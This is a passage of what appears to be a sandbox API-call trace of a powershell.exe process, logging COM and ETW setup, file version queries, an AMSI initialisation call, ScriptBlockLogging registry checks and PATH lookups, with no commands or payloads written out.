	[0061.408] CloseHandle (hObject=0x8d8) returned 1
	[0061.409] CloseHandle (hObject=0x8d4) returned 1
	[0061.409] DeregisterEventSource (hEventLog=0x1505f5b0008) returned 1
	[0061.410] CloseHandle (hObject=0xa4c) returned 1
	[0061.410] CloseHandle (hObject=0x95c) returned 1
	[0061.410] CloseHandle (hObject=0x274) returned 1
	[0061.410] CloseHandle (hObject=0x958) returned 1
	[0061.410] CloseHandle (hObject=0x954) returned 1
	[0061.411] CloseHandle (hObject=0x950) returned 1
	[0061.411] CloseHandle (hObject=0xa20) returned 1
	[0061.412] CloseHandle (hObject=0xa34) returned 1
	[0061.412] CloseHandle (hObject=0x5e0) returned 1
	[0061.412] CloseHandle (hObject=0xa2c) returned 1
	[0061.413] CloseHandle (hObject=0x5f4) returned 1
	[0061.413] RegCloseKey (hKey=0xffffffff80000004) returned 0x0
	[0061.413] CloseHandle (hObject=0x26c) returned 1
	[0061.413] CloseHandle (hObject=0x5d4) returned 1
	[0061.413] CloseHandle (hObject=0x5d8) returned 1
	[0061.413] CloseHandle (hObject=0x5f0) returned 1
	[0061.414] CloseHandle (hObject=0x5c4) returned 1
	[0061.414] CloseHandle (hObject=0x5cc) returned 1
	[0061.414] CloseHandle (hObject=0x5e8) returned 1
	[0061.415] CoGetContextToken (in: pToken=0x184b5fee30 | out: pToken=0x184b5fee30) returned 0x0
	[0061.415] CoGetContextToken (in: pToken=0x184b5fed30 | out: pToken=0x184b5fed30) returned 0x0
	[0061.415] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x2
	[0061.415] Release () returned 0x1
	[0061.415] CoGetContextToken (in: pToken=0x184b5fed30 | out: pToken=0x184b5fed30) returned 0x0
	[0061.415] Stream:IUnknown:Release (This=0x1505fbce220) returned 0x1
	[0061.415] Stream:IUnknown:Release (This=0x1505fbce220) returned 0x0
	[0061.416] SleepEx (dwMilliseconds=0xffffffff, bAlertable=0) 

Thread:
	id = 22
	os_tid = 0xe34

	[0041.586] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0041.586] CoGetContextToken (in: pToken=0x184b67f7c0 | out: pToken=0x184b67f7c0) returned 0x0
	[0041.586] CObjectContext::QueryInterface () returned 0x0
	[0041.586] CObjectContext::GetCurrentThreadType () returned 0x0
	[0041.586] Release () returned 0x0
	[0041.586] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1
	[0041.586] CoUninitialize () 
	[0041.586] RoInitialize () returned 0x1
	[0041.586] RoUninitialize () returned 0x0
	[0061.414] CoGetContextToken (in: pToken=0x184b67f3e0 | out: pToken=0x184b67f3e0) returned 0x0
	[0061.414] IUnknown:QueryInterface (in: This=0x15045551b48, riid=0x7ffbf89265e0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184b67f418 | out: ppvObject=0x184b67f418*=0x15045551b60) returned 0x0
	[0061.415] IComThreadingInfo:GetCurrentThreadType (in: This=0x15045551b60, pThreadType=0x184b67f488 | out: pThreadType=0x184b67f488*=0) returned 0x0
	[0061.415] IUnknown:Release (This=0x15045551b60) returned 0x0
	[0061.416] SleepEx (dwMilliseconds=0xffffffff, bAlertable=0) 

Thread:
	id = 23
	os_tid = 0xe4c

	[0041.587] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0041.587] RoInitialize () returned 0x1
	[0041.587] RoUninitialize () returned 0x0
	[0041.589] GetCurrentProcessId () returned 0xff8
	[0041.590] EtwEventWriteTransfer (RegHandle=0x230150455400c0, EventDescriptor=0x184b6ff290, ActivityId=0x184b6ff1a0, RelatedActivityId=0x0, UserDataCount=0x8, UserData=0x184b6ff080) returned 0x0
	[0041.590] EtwEventWriteTransfer (RegHandle=0x230150455400c0, EventDescriptor=0x184b6ff408, ActivityId=0x184b6ff280, RelatedActivityId=0x0, UserDataCount=0x2, UserData=0x184b6ff1c0) returned 0x0
	[0041.592] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x328
	[0041.594] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Threading.OverlappedData_Disabled", lpBuffer=0x184b6fe090, nSize=0x80 | out: lpBuffer="\xfffe\xffff\xffff\xffff\x2b84\xf825\x7ffb") returned 0x0
	[0041.594] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Threading.OverlappedData_MinCount", lpBuffer=0x184b6fe090, nSize=0x80 | out: lpBuffer="\xfffe\xffff\xffff\xffff\x2b84\xf825\x7ffb") returned 0x0
	[0041.595] EtwEventRegister (in: ProviderId=0x150471093d0, EnableCallback=0x1505f5a3f0c, CallbackContext=0x0, RegHandle=0x150471093b0 | out: RegHandle=0x150471093b0) returned 0x0
	[0041.595] EtwEventSetInformation (RegHandle=0x3d0150455c2ee0, InformationClass=0x2, EventInformation=0x15047109360, InformationLength=0x2e) returned 0x0
	[0041.600] ConnectNamedPipe (in: hNamedPipe=0x2f0, lpOverlapped=0x150471096b8 | out: lpOverlapped=0x150471096b8) returned 0

Thread:
	id = 24
	os_tid = 0xe54


Thread:
	id = 25
	os_tid = 0xe58


Thread:
	id = 26
	os_tid = 0xfa0

	[0045.336] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
	[0045.399] RoInitialize () returned 0x1
	[0045.400] RoUninitialize () returned 0x0
	[0045.400] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x184c18ea80*=0x5d0, lpdwindex=0x184c18e854 | out: lpdwindex=0x184c18e854) returned 0x0
	[0045.760] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0045.869] CoCreateGuid (in: pguid=0x184c18e928 | out: pguid=0x184c18e928*(Data1=0x59e51f14, Data2=0x9d29, Data3=0x4d11, Data4=([0]=0x98, [1]=0x25, [2]=0x55, [3]=0xdd, [4]=0x32, [5]=0x2b, [6]=0x89, [7]=0x5b))) returned 0x0
	[0045.887] GetCurrentProcessId () returned 0xff8
	[0045.888] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xff8) returned 0x638
	[0045.888] EnumProcessModules (in: hProcess=0x638, lphModule=0x150479e6548, cb=0x200, lpcbNeeded=0x184c18e708 | out: lphModule=0x150479e6548, lpcbNeeded=0x184c18e708) returned 1
	[0045.889] EnumProcessModules (in: hProcess=0x638, lphModule=0x150479e6760, cb=0x400, lpcbNeeded=0x184c18e708 | out: lphModule=0x150479e6760, lpcbNeeded=0x184c18e708) returned 1
	[0045.890] GetModuleInformation (in: hProcess=0x638, hModule=0x7ff7f50e0000, lpmodinfo=0x150479e6bd0, cb=0x18 | out: lpmodinfo=0x150479e6bd0*(lpBaseOfDll=0x7ff7f50e0000, SizeOfImage=0x78000, EntryPoint=0x7ff7f50e31a0)) returned 1
	[0045.890] CoTaskMemAlloc (cb=0x804) returned 0x1505f45bd60
	[0045.890] GetModuleBaseNameW (in: hProcess=0x638, hModule=0x7ff7f50e0000, lpBaseName=0x1505f45bd60, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0045.890] CoTaskMemFree (pv=0x1505f45bd60) 
	[0045.890] CoTaskMemAlloc (cb=0x804) returned 0x1505f45c570
	[0045.890] GetModuleFileNameExW (in: hProcess=0x638, hModule=0x7ff7f50e0000, lpFilename=0x1505f45c570, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0045.891] CoTaskMemFree (pv=0x1505f45c570) 
	[0045.891] CloseHandle (hObject=0x638) returned 1
	[0045.891] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xff8) returned 0x638
	[0045.891] EnumProcessModules (in: hProcess=0x638, lphModule=0x150479e8e38, cb=0x200, lpcbNeeded=0x184c18e708 | out: lphModule=0x150479e8e38, lpcbNeeded=0x184c18e708) returned 1
	[0045.892] EnumProcessModules (in: hProcess=0x638, lphModule=0x150479e9050, cb=0x400, lpcbNeeded=0x184c18e708 | out: lphModule=0x150479e9050, lpcbNeeded=0x184c18e708) returned 1
	[0045.893] GetModuleInformation (in: hProcess=0x638, hModule=0x7ff7f50e0000, lpmodinfo=0x150479e94c0, cb=0x18 | out: lpmodinfo=0x150479e94c0*(lpBaseOfDll=0x7ff7f50e0000, SizeOfImage=0x78000, EntryPoint=0x7ff7f50e31a0)) returned 1
	[0045.893] CoTaskMemAlloc (cb=0x804) returned 0x1505f45b550
	[0045.893] GetModuleBaseNameW (in: hProcess=0x638, hModule=0x7ff7f50e0000, lpBaseName=0x1505f45b550, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0045.893] CoTaskMemFree (pv=0x1505f45b550) 
	[0045.893] CoTaskMemAlloc (cb=0x804) returned 0x1505f45cd80
	[0045.893] GetModuleFileNameExW (in: hProcess=0x638, hModule=0x7ff7f50e0000, lpFilename=0x1505f45cd80, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0045.893] CoTaskMemFree (pv=0x1505f45cd80) 
	[0045.893] CloseHandle (hObject=0x638) returned 1
	[0045.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x184c18e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0045.894] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18e610) returned 1
	[0045.894] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x184c18e6f0 | out: lpFileInformation=0x184c18e6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2c94e9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2c94e9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2c94e9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74a00)) returned 1
	[0045.895] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18e5d0) returned 1
	[0045.895] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpdwHandle=0x184c18e7c8 | out: lpdwHandle=0x184c18e7c8) returned 0x73c
	[0045.895] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwHandle=0x0, dwLen=0x73c, lpData=0x150479eb808 | out: lpData=0x150479eb808) returned 1
	[0045.896] VerQueryValueW (in: pBlock=0x150479eb808, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x184c18e748, puLen=0x184c18e740 | out: lplpBuffer=0x184c18e748*=0x150479ebba0, puLen=0x184c18e740) returned 1
	[0045.896] VerQueryValueW (in: pBlock=0x150479eb808, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\CompanyName", lplpBuffer=0x184c18e6e8, puLen=0x184c18e6e0 | out: lplpBuffer=0x184c18e6e8*=0x150479eb8c0, puLen=0x184c18e6e0) returned 1
	[0045.896] VerQueryValueW (in: pBlock=0x150479eb808, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileDescription", lplpBuffer=0x184c18e6e8, puLen=0x184c18e6e0 | out: lplpBuffer=0x184c18e6e8*=0x150479eb914, puLen=0x184c18e6e0) returned 1
	[0045.896] VerQueryValueW (in: pBlock=0x150479eb808, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileVersion", lplpBuffer=0x184c18e6e8, puLen=0x184c18e6e0 | out: lplpBuffer=0x184c18e6e8*=0x150479eb95c, puLen=0x184c18e6e0) returned 1
	[0045.896] VerQueryValueW (in: pBlock=0x150479eb808, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\InternalName", lplpBuffer=0x184c18e6e8, puLen=0x184c18e6e0 | out: lplpBuffer=0x184c18e6e8*=0x150479eb9cc, puLen=0x184c18e6e0) returned 1
	[0045.896] VerQueryValueW (in: pBlock=0x150479eb808, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalCopyright", lplpBuffer=0x184c18e6e8, puLen=0x184c18e6e0 | out: lplpBuffer=0x184c18e6e8*=0x150479eba08, puLen=0x184c18e6e0) returned 1
	[0045.896] VerQueryValueW (in: pBlock=0x150479eb808, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\OriginalFilename", lplpBuffer=0x184c18e6e8, puLen=0x184c18e6e0 | out: lplpBuffer=0x184c18e6e8*=0x150479eba8c, puLen=0x184c18e6e0) returned 1
	[0045.896] VerQueryValueW (in: pBlock=0x150479eb808, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductName", lplpBuffer=0x184c18e6e8, puLen=0x184c18e6e0 | out: lplpBuffer=0x184c18e6e8*=0x150479ebad4, puLen=0x184c18e6e0) returned 1
	[0045.896] VerQueryValueW (in: pBlock=0x150479eb808, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductVersion", lplpBuffer=0x184c18e6e8, puLen=0x184c18e6e0 | out: lplpBuffer=0x184c18e6e8*=0x150479ebb44, puLen=0x184c18e6e0) returned 1
	[0045.896] VerQueryValueW (in: pBlock=0x150479eb808, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\Comments", lplpBuffer=0x184c18e6e8, puLen=0x184c18e6e0 | out: lplpBuffer=0x184c18e6e8*=0x0, puLen=0x184c18e6e0) returned 0
	[0045.896] VerQueryValueW (in: pBlock=0x150479eb808, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalTrademarks", lplpBuffer=0x184c18e6e8, puLen=0x184c18e6e0 | out: lplpBuffer=0x184c18e6e8*=0x0, puLen=0x184c18e6e0) returned 0
	[0045.896] VerQueryValueW (in: pBlock=0x150479eb808, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\PrivateBuild", lplpBuffer=0x184c18e6e8, puLen=0x184c18e6e0 | out: lplpBuffer=0x184c18e6e8*=0x0, puLen=0x184c18e6e0) returned 0
	[0045.896] VerQueryValueW (in: pBlock=0x150479eb808, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\SpecialBuild", lplpBuffer=0x184c18e6e8, puLen=0x184c18e6e0 | out: lplpBuffer=0x184c18e6e8*=0x0, puLen=0x184c18e6e0) returned 0
	[0045.896] VerQueryValueW (in: pBlock=0x150479eb808, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x184c18e698, puLen=0x184c18e690 | out: lplpBuffer=0x184c18e698*=0x150479ebba0, puLen=0x184c18e690) returned 1
	[0045.896] VerLanguageNameW (in: wLang=0x409, szLang=0x184c18e3c0, cchLang=0x100 | out: szLang="English (United States)") returned 0x17
	[0045.897] VerQueryValueW (in: pBlock=0x150479eb808, lpSubBlock="\\", lplpBuffer=0x184c18e6e8, puLen=0x184c18e6e0 | out: lplpBuffer=0x184c18e6e8*=0x150479eb830, puLen=0x184c18e6e0) returned 1
	[0045.963] AmsiInitialize () returned 0x80070103
	[0045.987] EtwEventRegister (in: ProviderId=0x150479eeb70, EnableCallback=0x1505f5a40cc, CallbackContext=0x0, RegHandle=0x150479eeb50 | out: RegHandle=0x150479eeb50) returned 0x0
	[0045.987] EtwEventSetInformation (RegHandle=0x4e01505f3c80e0, InformationClass=0x2, EventInformation=0x150479eeb08, InformationLength=0x28) returned 0x0
	[0045.992] RoGetParameterizedTypeInstanceIID () returned 0x0
	[0045.992] Ro::detail::SimpleMetaDataBuilder::SetParameterizedInterface () returned 0x0
	[0045.992] Ro::detail::SimpleMetaDataBuilder::SetParameterizedInterface () returned 0x0
	[0046.019] WindowsCreateStringReference () returned 0x0
	[0046.019] RoGetActivationFactory () returned 0x0
	[0046.021] QueryInterface () returned 0x0
	[0046.021] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002
	[0046.021] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002
	[0046.022] QueryInterface () returned 0x0
	[0046.022] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::GetRuntimeClassName () returned 0x8000000e
	[0046.022] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x3
	[0046.022] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::AddRef () returned 0x4
	[0046.022] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002
	[0046.022] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x0
	[0046.022] Release () returned 0x4
	[0046.022] CoGetContextToken (in: pToken=0x184c18c3b0 | out: pToken=0x184c18c3b0) returned 0x0
	[0046.022] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002
	[0046.022] CoGetContextToken (in: pToken=0x184c18c5f0 | out: pToken=0x184c18c5f0) returned 0x0
	[0046.022] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x0
	[0046.022] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x4
	[0046.022] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x3
	[0046.023] WindowsDeleteString () returned 0x0
	[0046.023] Release () returned 0x2
	[0046.023] CoGetContextToken (in: pToken=0x184c18d020 | out: pToken=0x184c18d020) returned 0x0
	[0046.023] CoGetContextToken (in: pToken=0x184c18cf20 | out: pToken=0x184c18cf20) returned 0x0
	[0046.023] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x0
	[0046.023] AddRef () returned 0x4
	[0046.023] Release () returned 0x3
	[0046.029] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::add_TracingStatusChanged () returned 0x0
	[0046.038] GenericStreamBase<IStream>::Write () returned 0x0
	[0046.038] GenericStreamBase<IStream>::Write () returned 0x0
	[0046.038] CoCreateGuid (in: pguid=0x7ffbf8b45390 | out: pguid=0x7ffbf8b45390*(Data1=0x1c7ab5fd, Data2=0x25c5, Data3=0x4543, Data4=([0]=0x98, [1]=0x68, [2]=0xaf, [3]=0xf, [4]=0x48, [5]=0x9e, [6]=0x94, [7]=0x23))) returned 0x0
	[0046.039] GenericStreamBase<IStream>::Write () returned 0x0
	[0046.040] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x0
	[0046.040] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::AddRef () returned 0x3
	[0046.040] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x80004002
	[0046.040] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x0
	[0046.040] Release () returned 0x3
	[0046.040] CoGetContextToken (in: pToken=0x184c18c160 | out: pToken=0x184c18c160) returned 0x0
	[0046.040] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x80004002
	[0046.041] WindowsCreateString () returned 0x0
	[0046.041] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::AddRef () returned 0x4
	[0046.041] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::Release () returned 0x3
	[0046.043] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::get_Enabled () returned 0x0
	[0046.351] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x184c18e670, nSize=0x80 | out: lpBuffer="\x01") returned 0x0
	[0046.384] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x184c18ea48*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18ea48*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x6, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0046.384] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18e950*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18e950*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0
	[0046.385] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x184c18ea28*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x6, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1)) | out: ActivityId=0x184c18ea28*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x6, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0046.388] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x184c18ea48*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18ea48*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x7, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0046.388] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18e950*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18e950*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x6, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0046.388] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x184c18ea28*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x7, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1)) | out: ActivityId=0x184c18ea28*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x7, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0046.414] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x184c18d5b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0046.415] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x184c18d5b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0046.421] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x184c18d610, nSize=0x80 | out: lpBuffer="\x01") returned 0x0
	[0046.448] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c18e6f8 | out: phkResult=0x184c18e6f8*=0x0) returned 0x2
	[0046.449] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c18e6f8 | out: phkResult=0x184c18e6f8*=0x0) returned 0x2
	[0046.450] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x184c18d560, nSize=0x80 | out: lpBuffer="\x01") returned 0x0
	[0046.455] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x184c18e000, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0046.457] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x184c18de00, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a
	[0046.457] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x184c18ddb0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a
	[0046.458] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x184c18de20, nSize=0x80 | out: lpBuffer="") returned 0x88
	[0046.458] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x184c18de10, nSize=0x88 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0046.464] CoTaskMemAlloc (cb=0x20e) returned 0x1505fbc10a0
	[0046.464] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1505fbc10a0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop") returned 0x19
	[0046.464] CoTaskMemFree (pv=0x1505fbc10a0) 
	[0046.468] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0046.468] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.468] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xe02be364, ftCreationTime.dwHighDateTime=0x1d31d80, ftLastAccessTime.dwLowDateTime=0xe02be364, ftLastAccessTime.dwHighDateTime=0x1d31d80, ftLastWriteTime.dwLowDateTime=0xe02be364, ftLastWriteTime.dwHighDateTime=0x1d31d80, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0046.470] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.470] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.471] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0046.472] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.ps1", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.ps1", lpFilePart=0x0) returned 0x32
	[0046.472] GetFullPathNameW (in: lpFileName="New-Object.ps1", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.ps1", lpFilePart=0x0) returned 0x28
	[0046.473] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.ps1", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.473] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.473] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.476] CoTaskMemAlloc (cb=0x20e) returned 0x1505fbbe400
	[0046.476] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1505fbbe400, nSize=0x105 | out: lpBuffer="View>\r\n            <Name>PathInfo</Name>\r\n            <ViewSelectedBy>\r\n                <TypeName>System.Management.Automation.PathInfo</TypeName>\r\n            </ViewSelectedBy>\r\n            <TableControl>\r\n                <TableHeaders>\r\n                    <T") returned 0x0
	[0046.476] CoTaskMemFree (pv=0x1505fbbe400) 
	[0046.476] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0046.476] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
